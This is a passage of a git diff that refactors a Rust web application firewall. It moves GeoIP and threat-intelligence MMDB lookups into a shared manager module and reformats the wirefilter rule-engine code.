Err(e) => { + log::warn!( + "🔍 [GeoIP] ASN Lookup FAILED for {}: {}", + ip_clone, + e + ); + Ok((0, String::new())) + } + } + } + Err(e) => { + log::warn!("🔍 [GeoIP] ASN Lookup FAILED for {}: {}", ip_clone, e); + Ok((0, String::new())) + } + } + } + }) + .await?? + } else { + (0, String::new()) + }; + + // Country lookup (use country database if available, fallback to city database) + let reader = if let Ok(reader) = self.country.ensure_reader().await { + reader + } else if let Ok(reader) = self.city.ensure_reader().await { + reader + } else { + return Err(anyhow!("No GeoIP database available for country lookup")); + }; + + let (iso, country_name): (String, String) = tokio::task::spawn_blocking({ + let reader = reader.clone(); + let ip_clone = ip; + move || -> Result<(String, String), MaxMindDbError> { + match reader.lookup(ip_clone) { + Ok(lookup_result) => { + if !lookup_result.has_data() { + log::warn!("🔍 [GeoIP] Country Lookup: No data for {}", ip_clone); + return Ok((String::new(), String::new())); + } + match lookup_result.decode::() { + Ok(Some(country)) => { + log::debug!("🔍 [GeoIP] RAW Country Data for {}: {:?}", ip_clone, country); + + // Try multiple fields + let iso = country + .country + .iso_code + .unwrap_or("") + .to_string(); + + // Also try registered_country if country is empty + let iso = if iso.is_empty() { + country + .registered_country + .iso_code + .unwrap_or("") + .to_string() + } else { + iso + }; + + let country_name = country + .country + .names + .english + .map(|s| s.to_string()) + .unwrap_or_default(); + + if iso.is_empty() { + log::warn!("🔍 [GeoIP] Country Lookup for {} returned EMPTY iso_code (IP found but no country data in ANY field)", ip_clone); + } else { + log::info!("🔍 [GeoIP] Country Lookup Success for {}: Country='{}' ({})", ip_clone, iso, country_name); + } + Ok((iso, country_name)) + } + Ok(None) => { + log::warn!("🔍 [GeoIP] Country Lookup: No country data for {}", ip_clone); + Ok((String::new(), String::new())) + } + Err(e) => { + log::warn!("🔍 [GeoIP] Country Lookup FAILED for {}: IP NOT FOUND in database - {}", ip_clone, e); + Ok((String::new(), String::new())) + } + } + } + Err(e) => { + log::warn!("🔍 [GeoIP] Country Lookup FAILED for {}: IP NOT FOUND in database - {}", ip_clone, e); + Ok((String::new(), String::new())) + } + } + } + }) + .await??; + + Ok(( + GeoInfo { + country: country_name, + iso_code: iso.clone(), + asn_iso_code: iso, + }, + asn_num, + asn_org, + )) + } +} diff --git a/src/waf/mod.rs b/src/security/waf/mod.rs similarity index 54% rename from src/waf/mod.rs rename to src/security/waf/mod.rs index 056cfb0..e20a0b7 100644 --- a/src/waf/mod.rs +++ b/src/security/waf/mod.rs @@ -1,2 +1,4 @@ -pub mod wirefilter; pub mod actions; +pub mod geoip; +pub mod threat; +pub mod wirefilter; diff --git a/src/threat/mod.rs b/src/security/waf/threat/mod.rs similarity index 56% rename from src/threat/mod.rs rename to src/security/waf/threat/mod.rs index 744393a..4d2cb6c 100644 --- a/src/threat/mod.rs +++ b/src/security/waf/threat/mod.rs @@ -1,14 +1,14 @@ use std::{net::IpAddr, path::PathBuf, sync::Arc, time::Duration}; -use anyhow::{anyhow, Context, Result}; +use anyhow::{Result, anyhow}; use chrono::{DateTime, Utc}; -use maxminddb::{geoip2, MaxMindDbError, Reader}; -use memmap2::MmapOptions; -use std::fs::File; +use maxminddb::Reader; use pingora_memory_cache::MemoryCache; use serde::{Deserialize, Deserializer, Serialize}; use tokio::sync::{OnceCell, RwLock}; +pub use crate::security::waf::geoip::{GeoInfo, GeoIpManager}; + /// Custom deserializer for optional datetime fields that can be empty strings or missing fn deserialize_optional_datetime<'de, D>(deserializer: D) -> Result>, D::Error> where @@ -66,13 +66,7 @@ pub struct ThreatContext { pub geo: GeoInfo, } -#[derive(Debug, Clone, Serialize, Deserialize)] -pub struct GeoInfo { - pub country: String, - pub iso_code: String, - #[serde(rename = "asniso_code")] - pub asn_iso_code: String, -} +// GeoInfo is now in geoip module /// WAF fields extracted from threat data #[derive(Debug, Clone)] @@ -101,13 +95,8 @@ impl From<&ThreatResponse> for WafFields { /// Threat intel client: Threat MMDB first, then GeoIP MMDB fallback, with in-memory cache pub struct ThreatClient { threat_mmdb_path: Option, - geoip_country_path: Option, - geoip_asn_path: Option, - geoip_city_path: Option, threat_reader: RwLock>>>, - geoip_country_reader: RwLock>>>, - geoip_asn_reader: RwLock>>>, - geoip_city_reader: RwLock>>>, + geoip_manager: GeoIpManager, pingora_cache: Arc>, } @@ -145,13 +134,8 @@ impl ThreatClient { ) -> Self { Self { threat_mmdb_path, - geoip_country_path, - geoip_asn_path, - geoip_city_path, threat_reader: RwLock::new(None), - geoip_country_reader: RwLock::new(None), - geoip_asn_reader: RwLock::new(None), - geoip_city_reader: RwLock::new(None), + geoip_manager: GeoIpManager::new(geoip_country_path, geoip_asn_path, geoip_city_path), pingora_cache: Arc::new(MemoryCache::new(cache_size)), } } @@ -161,17 +145,7 @@ impl ThreatClient { } pub async fn refresh_geoip(&self) -> Result<()> { - // Refresh all geoip databases - if let Err(e) = self.refresh_geoip_country_reader().await { - log::warn!("Failed to refresh GeoIP Country database: {}", e); - } - if let Err(e) = self.refresh_geoip_asn_reader().await { - log::warn!("Failed to refresh GeoIP ASN database: {}", e); - } - if let Err(e) = self.refresh_geoip_city_reader().await { - log::warn!("Failed to refresh GeoIP City database: {}", e); - } - Ok(()) + self.geoip_manager.refresh_all().await } /// Get threat intelligence for an IP address with caching @@ -195,18 +169,25 @@ impl ThreatClient { }; // Check Threat MMDB first (if configured) - log::info!("🔍 [Threat] Checking Threat MMDB for {}", ip); + log::debug!("🔍 [Threat] Checking Threat MMDB for {}", ip); if let Some(threat_data) = self.lookup_threat_mmdb(ip, ip_addr).await? { - log::info!("🔍 [Threat] Found threat data in Threat MMDB for {}: score={}", ip, threat_data.intel.score); + log::debug!( + "🔍 [Threat] Found threat data in Threat MMDB for {}: score={}", + ip, + threat_data.intel.score + ); self.set_pingora_cache(ip, &threat_data).await; return Ok(Some(threat_data)); } // REST API disabled - skip directly to GeoIP fallback - log::info!("🔍 [Threat] No threat data found for {} in Threat MMDB, using GeoIP fallback", ip); + log::debug!( + "🔍 [Threat] No threat data found for {} in Threat MMDB, using GeoIP fallback", + ip + ); // GeoIP fallback - let (geo, asn, org) = self.lookup_geo(ip_addr).await?; + let (geo, asn, org) = self.geoip_manager.lookup(ip_addr).await?; let response = build_no_data_response(ip, ip_addr, geo, asn, org); self.set_pingora_cache(ip, &response).await; Ok(Some(response)) @@ -221,197 +202,30 @@ impl ThreatClient { } } - /// Open the MMDB from the configured local path using memory-mapped file access async fn refresh_threat_reader(&self) -> Result>> { - let mut path = self + let path = self .threat_mmdb_path .clone() .ok_or_else(|| anyhow!("Threat MMDB path not configured"))?; - // If the path doesn't have a file extension, treat it as a directory and append the filename - if path.extension().is_none() { - path = path.join("threat.mmdb"); - } - - // Use spawn_blocking since file operations are blocking - let reader = tokio::task::spawn_blocking({ - let path = path.clone(); - move || -> Result> { - let file = File::open(&path) - .with_context(|| format!("Failed to open Threat MMDB file {:?}", path))?; - let mmap = unsafe { - MmapOptions::new() - .map(&file) - .with_context(|| format!("Failed to memory-map Threat MMDB from {:?}", path))? - }; - Reader::from_source(mmap) - .with_context(|| format!("Failed to parse Threat MMDB from {:?}", path)) - } - }) - .await - .context("Failed to spawn blocking task for MMDB open")??; - - let arc = Arc::new(reader); + use crate::utils::maxmind::MaxMindReader; + let reader = MaxMindReader::open(path, Some("threat.mmdb")).await?; + let reader_arc = reader.clone_reader(); let mut guard = self.threat_reader.write().await; - *guard = Some(arc.clone()); - - log::info!("Threat MMDB opened (memory-mapped) from {:?}", path); - - Ok(arc) - } - - async fn refresh_geoip_country_reader(&self) -> Result>> { - let mut path = self - .geoip_country_path - .clone() - .ok_or_else(|| anyhow!("GeoIP Country MMDB path not configured"))?; - - // If the path doesn't have a file extension, treat it as a directory and append the filename - if path.extension().is_none() { - path = path.join("GeoLite2-Country.mmdb"); - } - - // Use spawn_blocking since file operations are blocking - let reader = tokio::task::spawn_blocking({ - let path = path.clone(); - move || -> Result> { - let file = File::open(&path) - .with_context(|| format!("Failed to open GeoIP Country MMDB file {:?}", path))?; - let mmap = unsafe { - MmapOptions::new() - .map(&file) - .with_context(|| format!("Failed to memory-map GeoIP Country MMDB from {:?}", path))? - }; - Reader::from_source(mmap) - .with_context(|| format!("Failed to parse GeoIP Country MMDB from {:?}", path)) - } - }) - .await - .context("Failed to spawn blocking task for MMDB open")??; - - let arc = Arc::new(reader); - - let mut guard = self.geoip_country_reader.write().await; - *guard = Some(arc.clone()); - - log::info!("GeoIP Country MMDB opened (memory-mapped) from {:?}", path); - - Ok(arc) - } + *guard = Some(reader_arc.clone()); - async fn refresh_geoip_asn_reader(&self) -> Result>> { - let mut path = self - .geoip_asn_path - .clone() - .ok_or_else(|| anyhow!("GeoIP ASN MMDB path not configured"))?; - - // If the path doesn't have a file extension, treat it as a directory and append the filename - if path.extension().is_none() { - path = path.join("GeoLite2-ASN.mmdb"); - } - - // Use spawn_blocking since file operations are blocking - let reader = tokio::task::spawn_blocking({ - let path = path.clone(); - move || -> Result> { - let file = File::open(&path) - .with_context(|| format!("Failed to open GeoIP ASN MMDB file {:?}", path))?; - let mmap = unsafe { - MmapOptions::new() - .map(&file) - .with_context(|| format!("Failed to memory-map GeoIP ASN MMDB from {:?}", path))? - }; - Reader::from_source(mmap) - .with_context(|| format!("Failed to parse GeoIP ASN MMDB from {:?}", path)) - } - }) - .await - .context("Failed to spawn blocking task for MMDB open")??; - - let arc = Arc::new(reader); - - let mut guard = self.geoip_asn_reader.write().await; - *guard = Some(arc.clone()); - - log::info!("GeoIP ASN MMDB opened (memory-mapped) from {:?}", path); - - Ok(arc) - } - - async fn refresh_geoip_city_reader(&self) -> Result>> { - let mut path = self - .geoip_city_path - .clone() - .ok_or_else(|| anyhow!("GeoIP City MMDB path not configured"))?; - - // If the path doesn't have a file extension, treat it as a directory and append the filename - if path.extension().is_none() { - path = path.join("GeoLite2-City.mmdb"); - } - - // Use spawn_blocking since file operations are blocking - let reader = tokio::task::spawn_blocking({ - let path = path.clone(); - move || -> Result> { - let file = File::open(&path) - .with_context(|| format!("Failed to open GeoIP City MMDB file {:?}", path))?; - let mmap = unsafe { - MmapOptions::new() - .map(&file) - .with_context(|| format!("Failed to memory-map GeoIP City MMDB from {:?}", path))? - }; - Reader::from_source(mmap) - .with_context(|| format!("Failed to parse GeoIP City MMDB from {:?}", path)) - } - }) - .await - .context("Failed to spawn blocking task for MMDB open")??; - - let arc = Arc::new(reader); - - let mut guard = self.geoip_city_reader.write().await; - *guard = Some(arc.clone()); - - log::info!("GeoIP City MMDB opened (memory-mapped) from {:?}", path); - - Ok(arc) - } - - async fn ensure_geoip_country_reader(&self) -> Result>> { - { - let guard = self.geoip_country_reader.read().await; - if let Some(existing) = guard.as_ref() { - return Ok(existing.clone()); - } - } - self.refresh_geoip_country_reader().await - } - - async fn ensure_geoip_asn_reader(&self) -> Result>> { - { - let guard = self.geoip_asn_reader.read().await; - if let Some(existing) = guard.as_ref() { - return Ok(existing.clone()); - } - } - self.refresh_geoip_asn_reader().await - } - - async fn ensure_geoip_city_reader(&self) -> Result>> { - { - let guard = self.geoip_city_reader.read().await; - if let Some(existing) = guard.as_ref() { - return Ok(existing.clone()); - } - } - self.refresh_geoip_city_reader().await + Ok(reader_arc) } /// Look up threat intelligence from the Threat MMDB - async fn lookup_threat_mmdb(&self, ip: &str, ip_addr: IpAddr) -> Result> { - log::info!("🔍 [Threat MMDB] Starting lookup for {}", ip); + async fn lookup_threat_mmdb( + &self, + ip: &str, + ip_addr: IpAddr, + ) -> Result> { + log::debug!("🔍 [Threat MMDB] Starting lookup for {}", ip); // Check if threat reader is available let reader_opt = { @@ -421,11 +235,14 @@ impl ThreatClient { let reader = match reader_opt { Some(r) => { - log::info!("🔍 [Threat MMDB] Reader available, performing lookup"); + log::debug!("🔍 [Threat MMDB] Reader available, performing lookup"); r } None => { - log::warn!("🔍 [Threat MMDB] Reader not loaded, skipping threat lookup for {}", ip); + log::warn!( + "🔍 [Threat MMDB] Reader not loaded, skipping threat lookup for {}", + ip + ); return Ok(None); } }; @@ -437,17 +254,20 @@ impl ThreatClient { move || -> Result { let lookup_result = reader.lookup(ip_addr_clone)?; if !lookup_result.has_data() { - return Err(maxminddb::MaxMindDbError::invalid_input("IP address not found in database")); + return Err(maxminddb::MaxMindDbError::invalid_input( + "IP address not found in database", + )); } - lookup_result.decode()? - .ok_or_else(|| maxminddb::MaxMindDbError::invalid_input("Failed to decode threat data")) + lookup_result.decode()?.ok_or_else(|| { + maxminddb::MaxMindDbError::invalid_input("Failed to decode threat data") + }) } }) .await; match result { Ok(Ok(threat_data)) => { - log::info!("🔍 [Threat MMDB] Found data for {}: {:?}", ip, threat_data); + log::debug!("🔍 [Threat MMDB] Found data for {}: {:?}", ip, threat_data); Ok(Some(threat_data)) } Ok(Err(e)) => { @@ -461,135 +281,6 @@ impl ThreatClient { } } - async fn lookup_geo(&self, ip: IpAddr) -> Result<(GeoInfo, u32, String)> { - log::debug!("🔍 [GeoIP] Looking up IP: {}", ip); - - // ASN lookup (use ASN database if available, otherwise try country database) - let (asn_num, asn_org) = if let Ok(reader) = self.ensure_geoip_asn_reader().await { - tokio::task::spawn_blocking({ - let reader = reader.clone(); - let ip_clone = ip; - move || -> Result<(u32, String), MaxMindDbError> { - match reader.lookup(ip_clone) { - Ok(lookup_result) => { - if !lookup_result.has_data() { - log::warn!("🔍 [GeoIP] ASN Lookup: No data for {}", ip_clone); - return Ok((0, String::new())); - } - match lookup_result.decode::() { - Ok(Some(res)) => { - let asn = res.autonomous_system_number.unwrap_or(0); - let org = res.autonomous_system_organization.unwrap_or("").to_string(); - log::info!("🔍 [GeoIP] ASN Lookup Success for {}: ASN={}, Org='{}'", ip_clone, asn, org); - Ok((asn, org)) - } - Ok(None) => { - log::warn!("🔍 [GeoIP] ASN Lookup: No ASN data for {}", ip_clone); - Ok((0, String::new())) - } - Err(e) => { - log::warn!("🔍 [GeoIP] ASN Lookup FAILED for {}: {}", ip_clone, e); - Ok((0, String::new())) - } - } - } - Err(e) => { - log::warn!("🔍 [GeoIP] ASN Lookup FAILED for {}: {}", ip_clone, e); - Ok((0, String::new())) - } - } - } - }) - .await?? - } else { - (0, String::new()) - }; - - // Country lookup (use country database if available, fallback to city database) - let reader2 = if let Ok(reader) = self.ensure_geoip_country_reader().await { - reader - } else if let Ok(reader) = self.ensure_geoip_city_reader().await { - reader - } else { - return Err(anyhow!("No GeoIP database available for country lookup")); - }; - let (iso, country_name): (String, String) = tokio::task::spawn_blocking({ - let reader = reader2.clone(); - let ip_clone = ip; - move || -> Result<(String, String), MaxMindDbError> { - match reader.lookup(ip_clone) { - Ok(lookup_result) => { - if !lookup_result.has_data() { - log::warn!("🔍 [GeoIP] Country Lookup: No data for {}", ip_clone); - return Ok((String::new(), String::new())); - } - match lookup_result.decode::() { - Ok(Some(country)) => { - // Debug: Log the raw country data structure - log::info!("🔍 [GeoIP] RAW Country Data for {}: {:?}", ip_clone, country); - - // Try multiple fields - let iso = country - .country - .iso_code - .unwrap_or("") - .to_string(); - - // Also try registered_country if country is empty - let iso = if iso.is_empty() { - country - .registered_country - .iso_code - .unwrap_or("") - .to_string() - } else { - iso - }; - - let country_name = country - .country - .names - .english - .map(|s| s.to_string()) - .unwrap_or_default(); - - if iso.is_empty() { - log::warn!("🔍 [GeoIP] Country Lookup for {} returned EMPTY iso_code (IP found but no country data in ANY field)", ip_clone); - } else { - log::info!("🔍 [GeoIP] Country Lookup Success for {}: Country='{}' ({})", ip_clone, iso, country_name); - } - Ok((iso, country_name)) - } - Ok(None) => { - log::warn!("🔍 [GeoIP] Country Lookup: No country data for {}", ip_clone); - Ok((String::new(), String::new())) - } - Err(e) => { - log::warn!("🔍 [GeoIP] Country Lookup FAILED for {}: IP NOT FOUND in database - {}", ip_clone, e); - Ok((String::new(), String::new())) - } - } - } - Err(e) => { - log::warn!("🔍 [GeoIP] Country Lookup FAILED for {}: IP NOT FOUND in database - {}", ip_clone, e); - Ok((String::new(), String::new())) - } - } - } - }) - .await??; - - Ok(( - GeoInfo { - country: country_name, - iso_code: iso.clone(), - asn_iso_code: iso, - }, - asn_num, - asn_org, - )) - } - /// Set data in pingora-memory-cache with TTL from record async fn set_pingora_cache(&self, ip: &str, data: &ThreatResponse) { let ttl = Duration::from_secs(data.ttl_s); @@ -613,7 +304,8 @@ pub async fn init_threat_client( geoip_asn_path, geoip_city_path, DEFAULT_THREAT_CACHE_SIZE, - ).await + ) + .await } /// Initialize the global threat client with configurable cache size @@ -633,7 +325,10 @@ pub async fn init_threat_client_with_cache_size( cache_size, )); - log::info!("Initializing threat client with cache size: {} entries", cache_size); + log::info!( + "Initializing threat client with cache size: {} entries", + cache_size + ); // Best-effort initial load from local MMDB paths. // If the files are not present yet, the workers can download them later. @@ -641,14 +336,8 @@ pub async fn init_threat_client_with_cache_size( log::warn!("Initial Threat MMDB load failed: {}", e); } - if let Err(e) = client.refresh_geoip_country_reader().await { - log::warn!("Initial GeoIP Country MMDB load failed: {}", e); - } - if let Err(e) = client.refresh_geoip_asn_reader().await { - log::warn!("Initial GeoIP ASN MMDB load failed: {}", e); - } - if let Err(e) = client.refresh_geoip_city_reader().await { - log::warn!("Initial GeoIP City MMDB load failed: {}", e); + if let Err(e) = client.geoip_manager.refresh_all().await { + log::warn!("Initial GeoIP MMDB load failed: {}", e); } THREAT_CLIENT @@ -682,7 +371,7 @@ pub async fn refresh_geoip_country_mmdb() -> Result<()> { .get() .ok_or_else(|| anyhow::anyhow!("Threat client not initialized"))?; - client.refresh_geoip_country_reader().await.map(|_| ()) + client.geoip_manager.refresh_country().await.map(|_| ()) } /// Trigger an immediate GeoIP ASN MMDB refresh (used by worker) @@ -691,7 +380,7 @@ pub async fn refresh_geoip_asn_mmdb() -> Result<()> { .get() .ok_or_else(|| anyhow::anyhow!("Threat client not initialized"))?; - client.refresh_geoip_asn_reader().await.map(|_| ()) + client.geoip_manager.refresh_asn().await.map(|_| ()) } /// Trigger an immediate GeoIP City MMDB refresh (used by worker) @@ -700,7 +389,7 @@ pub async fn refresh_geoip_city_mmdb() -> Result<()> { .get() .ok_or_else(|| anyhow::anyhow!("Threat client not initialized"))?; - client.refresh_geoip_city_reader().await.map(|_| ()) + client.geoip_manager.refresh_city().await.map(|_| ()) } /// Get threat intelligence for an IP address @@ -708,7 +397,10 @@ pub async fn get_threat_intel(ip: &str) -> Result> { let client = match THREAT_CLIENT.get() { Some(c) => c, None => { - log::trace!("Threat client not initialized (API key not provided), skipping threat intel lookup for {}", ip); + log::trace!( + "Threat client not initialized (API key not provided), skipping threat intel lookup for {}", + ip + ); return Ok(None); } }; @@ -721,7 +413,9 @@ pub async fn get_threat_intel(ip: &str) -> Result> { pub fn get_version_cache() -> Result>> { use std::sync::OnceLock; static VERSION_CACHE: OnceLock>> = OnceLock::new(); - Ok(VERSION_CACHE.get_or_init(|| Arc::new(MemoryCache::new(100))).clone()) + Ok(VERSION_CACHE + .get_or_init(|| Arc::new(MemoryCache::new(100))) + .clone()) } /// Get WAF fields for an IP address @@ -729,7 +423,10 @@ pub async fn get_waf_fields(ip: &str) -> Result> { let client = match THREAT_CLIENT.get() { Some(c) => c, None => { - log::trace!("Threat client not initialized (API key not provided), skipping WAF fields lookup for {}", ip); + log::trace!( + "Threat client not initialized (API key not provided), skipping WAF fields lookup for {}", + ip + ); return Ok(None); } }; @@ -737,8 +434,13 @@ pub async fn get_waf_fields(ip: &str) -> Result> { client.get_waf_fields(ip).await } - -fn build_no_data_response(ip: &str, ip_addr: IpAddr, geo: GeoInfo, asn: u32, org: String) -> ThreatResponse { +fn build_no_data_response( + ip: &str, + ip_addr: IpAddr, + geo: GeoInfo, + asn: u32, + org: String, +) -> ThreatResponse { ThreatResponse { schema_version: "1.0".to_string(), tenant_id: "geoip".to_string(), @@ -782,7 +484,8 @@ mod tests { iso_code: "US".to_string(), asn_iso_code: "US".to_string(), }; - let response = build_no_data_response(ip, ip_addr, geo.clone(), 12345, "Test Org".to_string()); + let response = + build_no_data_response(ip, ip_addr, geo.clone(), 12345, "Test Org".to_string()); assert_eq!(response.ip, ip); assert_eq!(response.context.ip_version, 4); @@ -803,7 +506,8 @@ mod tests { iso_code: "US".to_string(), asn_iso_code: "US".to_string(), }; - let response = build_no_data_response(ip, ip_addr, geo.clone(), 67890, "Test Org 2".to_string()); + let response = + build_no_data_response(ip, ip_addr, geo.clone(), 67890, "Test Org 2".to_string()); assert_eq!(response.ip, ip); assert_eq!(response.context.ip_version, 6); diff --git a/src/waf/wirefilter.rs b/src/security/waf/wirefilter.rs similarity index 71% rename from src/waf/wirefilter.rs rename to src/security/waf/wirefilter.rs index 8817b79..0d7c406 100644 --- a/src/waf/wirefilter.rs +++ b/src/security/waf/wirefilter.rs @@ -1,13 +1,13 @@ use std::collections::HashSet; use std::net::SocketAddr; -use std::sync::{Arc, RwLock, OnceLock}; +use std::sync::{Arc, OnceLock, RwLock}; +use crate::security::waf::threat; +use crate::worker::config::{Config, fetch_config}; use anyhow::Result; +use anyhow::anyhow; use sha2::{Digest, Sha256}; use wirefilter::{ExecutionContext, Scheme, TypedArray, TypedMap}; -use crate::worker::config::{Config, fetch_config}; -use crate::threat; -use anyhow::anyhow; /// String interner for WAF rule expressions /// This deduplicates expression strings to minimize memory usage. @@ -30,8 +30,8 @@ impl ExpressionInterner { /// If the expression was already interned, recomputes the hash but doesn't re-leak /// (The hash check prevents re-leaking the same expression) fn intern(&mut self, expr: &str) -> &'static str { - use std::hash::{Hash, Hasher}; use std::collections::hash_map::DefaultHasher; + use std::hash::{Hash, Hasher}; let mut hasher = DefaultHasher::new(); expr.hash(&mut hasher); @@ -103,13 +103,23 @@ pub struct WafResult { pub rule_name: String, pub rule_id: String, pub rate_limit_config: Option, - pub threat_response: Option, + pub threat_response: Option, } /// Wirefilter-based HTTP request filtering engine pub struct HttpFilter { scheme: Arc, - rules: Arc)>>>, // (filter, action, name, id, rate_limit_config) + rules: Arc< + RwLock< + Vec<( + wirefilter::Filter, + WafAction, + String, + String, + Option, + )>, + >, + >, // (filter, action, name, id, rate_limit_config) rules_hash: Arc>>, } @@ -176,27 +186,76 @@ impl HttpFilter { }; // Register functions used in Cloudflare-style expressions - builder.add_function("any", wirefilter::AnyFunction::default()).unwrap(); - builder.add_function("all", wirefilter::AllFunction::default()).unwrap(); - - builder.add_function("cidr", wirefilter::CIDRFunction::default()).unwrap(); - builder.add_function("concat", wirefilter::ConcatFunction::default()).unwrap(); - builder.add_function("decode_base64", wirefilter::DecodeBase64Function::default()).unwrap(); - builder.add_function("ends_with", wirefilter::EndsWithFunction::default()).unwrap(); - builder.add_function("json_lookup_integer", wirefilter::JsonLookupIntegerFunction::default()).unwrap(); - builder.add_function("json_lookup_string", wirefilter::JsonLookupStringFunction::default()).unwrap(); - builder.add_function("len", wirefilter::LenFunction::default()).unwrap(); - builder.add_function("lower", wirefilter::LowerFunction::default()).unwrap(); - builder.add_function("remove_bytes", wirefilter::RemoveBytesFunction::default()).unwrap(); - builder.add_function("remove_query_args", wirefilter::RemoveQueryArgsFunction::default()).unwrap(); - builder.add_function("starts_with", wirefilter::StartsWithFunction::default()).unwrap(); - builder.add_function("substring", wirefilter::SubstringFunction::default()).unwrap(); - builder.add_function("to_string", wirefilter::ToStringFunction::default()).unwrap(); - builder.add_function("upper", wirefilter::UpperFunction::default()).unwrap(); - builder.add_function("url_decode", wirefilter::UrlDecodeFunction::default()).unwrap(); - builder.add_function("uuid4", wirefilter::UUID4Function::default()).unwrap(); - builder.add_function("wildcard_replace", wirefilter::WildcardReplaceFunction::default()).unwrap(); - + builder + .add_function("any", wirefilter::AnyFunction::default()) + .unwrap(); + builder + .add_function("all", wirefilter::AllFunction::default()) + .unwrap(); + + builder + .add_function("cidr", wirefilter::CIDRFunction::default()) + .unwrap(); + builder + .add_function("concat", wirefilter::ConcatFunction::default()) + .unwrap(); + builder + .add_function("decode_base64", wirefilter::DecodeBase64Function::default()) + .unwrap(); + builder + .add_function("ends_with", wirefilter::EndsWithFunction::default()) + .unwrap(); + builder + .add_function( + "json_lookup_integer", + wirefilter::JsonLookupIntegerFunction::default(), + ) + .unwrap(); + builder + .add_function( + "json_lookup_string", + wirefilter::JsonLookupStringFunction::default(), + ) + .unwrap(); + builder + .add_function("len", wirefilter::LenFunction::default()) + .unwrap(); + builder + .add_function("lower", wirefilter::LowerFunction::default()) + .unwrap(); + builder + .add_function("remove_bytes", wirefilter::RemoveBytesFunction::default()) + .unwrap(); + builder + .add_function( + "remove_query_args", + wirefilter::RemoveQueryArgsFunction::default(), + ) + .unwrap(); + builder + .add_function("starts_with", wirefilter::StartsWithFunction::default()) + .unwrap(); + builder + .add_function("substring", wirefilter::SubstringFunction::default()) + .unwrap(); + builder + .add_function("to_string", wirefilter::ToStringFunction::default()) + .unwrap(); + builder + .add_function("upper", wirefilter::UpperFunction::default()) + .unwrap(); + builder + .add_function("url_decode", wirefilter::UrlDecodeFunction::default()) + .unwrap(); + builder + .add_function("uuid4", wirefilter::UUID4Function::default()) + .unwrap(); + builder + .add_function( + "wildcard_replace", + wirefilter::WildcardReplaceFunction::default(), + ) + .unwrap(); builder.build() } @@ -214,9 +273,13 @@ impl HttpFilter { Ok(Self { scheme, - rules: Arc::new(RwLock::new(vec![ - (filter, WafAction::Block, "default".to_string(), "default".to_string(), None) - ])), + rules: Arc::new(RwLock::new(vec![( + filter, + WafAction::Block, + "default".to_string(), + "default".to_string(), + None, + )])), rules_hash: Arc::new(RwLock::new(None)), }) } @@ -242,13 +305,21 @@ impl HttpFilter { for rule in &config.waf_rules.rules { // Basic validation - check if expression is not empty if rule.expression.trim().is_empty() { - log::warn!("Skipping empty WAF rule expression for rule '{}'", rule.name); + log::warn!( + "Skipping empty WAF rule expression for rule '{}'", + rule.name + ); continue; } // Try to parse the expression to validate it if let Err(error) = scheme.parse(&rule.expression) { - log::warn!("Invalid WAF rule expression for rule '{}': {}: {}", rule.name, rule.expression, error); + log::warn!( + "Invalid WAF rule expression for rule '{}': {}: {}", + rule.name, + rule.expression, + error + ); continue; } @@ -278,7 +349,13 @@ impl HttpFilter { None }; - compiled_rules.push((filter, action, rule.name.clone(), rule.id.clone(), rate_limit_config)); + compiled_rules.push(( + filter, + action, + rule.name.clone(), + rule.id.clone(), + rate_limit_config, + )); rules_hash_input.push_str(&format!("{}:{}:{};", rule.id, rule.action, rule.expression)); } @@ -292,7 +369,10 @@ impl HttpFilter { } let hash = Self::compute_rules_hash(&rules_hash_input); - log::debug!("WAF expression interner now has {} unique expressions", get_interned_expression_count()); + log::debug!( + "WAF expression interner now has {} unique expressions", + get_interned_expression_count() + ); Ok(Self { scheme, rules: Arc::new(RwLock::new(compiled_rules)), @@ -309,13 +389,21 @@ impl HttpFilter { for rule in &config.waf_rules.rules { // Basic validation - check if expression is not empty if rule.expression.trim().is_empty() { - log::warn!("Skipping empty WAF rule expression for rule '{}'", rule.name); + log::warn!( + "Skipping empty WAF rule expression for rule '{}'", + rule.name + ); continue; } // Try to parse the expression to validate it if let Err(error) = self.scheme.parse(&rule.expression) { - log::warn!("Invalid WAF rule expression for rule '{}': {}: {}", rule.name, rule.expression, error); + log::warn!( + "Invalid WAF rule expression for rule '{}': {}: {}", + rule.name, + rule.expression, + error + ); continue; } @@ -345,7 +433,13 @@ impl HttpFilter { None }; - compiled_rules.push((filter, action, rule.name.clone(), rule.id.clone(), rate_limit_config)); + compiled_rules.push(( + filter, + action, + rule.name.clone(), + rule.id.clone(), + rate_limit_config, + )); rules_hash_input.push_str(&format!("{}:{}:{};", rule.id, rule.action, rule.expression)); } @@ -362,8 +456,11 @@ impl HttpFilter { *self.rules.write().unwrap() = compiled_rules; *self.rules_hash.write().unwrap() = Some(new_hash); - log::info!("HTTP filter updated with {} WAF rules from config (expression interner: {} unique expressions)", - rules_count, get_interned_expression_count()); + log::info!( + "HTTP filter updated with {} WAF rules from config (expression interner: {} unique expressions)", + rules_count, + get_interned_expression_count() + ); Ok(()) } @@ -395,7 +492,9 @@ impl HttpFilter { let uri = &req_parts.uri; let scheme = uri.scheme().map(|s| s.as_str()).unwrap_or("http"); let host = uri.host().unwrap_or("").to_string(); - let port = uri.port_u16().unwrap_or(if scheme == "https" { 443 } else { 80 }); + let port = uri + .port_u16() + .unwrap_or(if scheme == "https" { 443 } else { 80 }); let path = uri.path().to_string(); let full_uri = uri.to_string(); let query = uri.query().unwrap_or("").to_string(); @@ -440,26 +539,14 @@ impl HttpFilter { self.scheme.get_field("http.request.scheme").unwrap(), scheme, )?; - ctx.set_field_value( - self.scheme.get_field("http.request.host").unwrap(), - host, - )?; + ctx.set_field_value(self.scheme.get_field("http.request.host").unwrap(), host)?; ctx.set_field_value( self.scheme.get_field("http.request.port").unwrap(), port as i64, )?; - ctx.set_field_value( - self.scheme.get_field("http.request.path").unwrap(), - path, - )?; - ctx.set_field_value( - self.scheme.get_field("http.request.uri").unwrap(), - full_uri, - )?; - ctx.set_field_value( - self.scheme.get_field("http.request.query").unwrap(), - query, - )?; + ctx.set_field_value(self.scheme.get_field("http.request.path").unwrap(), path)?; + ctx.set_field_value(self.scheme.get_field("http.request.uri").unwrap(), full_uri)?; + ctx.set_field_value(self.scheme.get_field("http.request.query").unwrap(), query)?; ctx.set_field_value( self.scheme.get_field("http.request.user_agent").unwrap(), user_agent, @@ -468,23 +555,26 @@ impl HttpFilter { self.scheme.get_field("http.request.content_type").unwrap(), content_type, )?; - ctx.set_field_value( - self.scheme.get_field("http.request.headers").unwrap(), - { - let mut headers_map: TypedMap<'_, TypedArray<'_, &[u8]>> = TypedMap::new(); - for (name, value) in req_parts.headers.iter() { - let key = name.as_str().to_ascii_lowercase().into_bytes().into_boxed_slice(); - 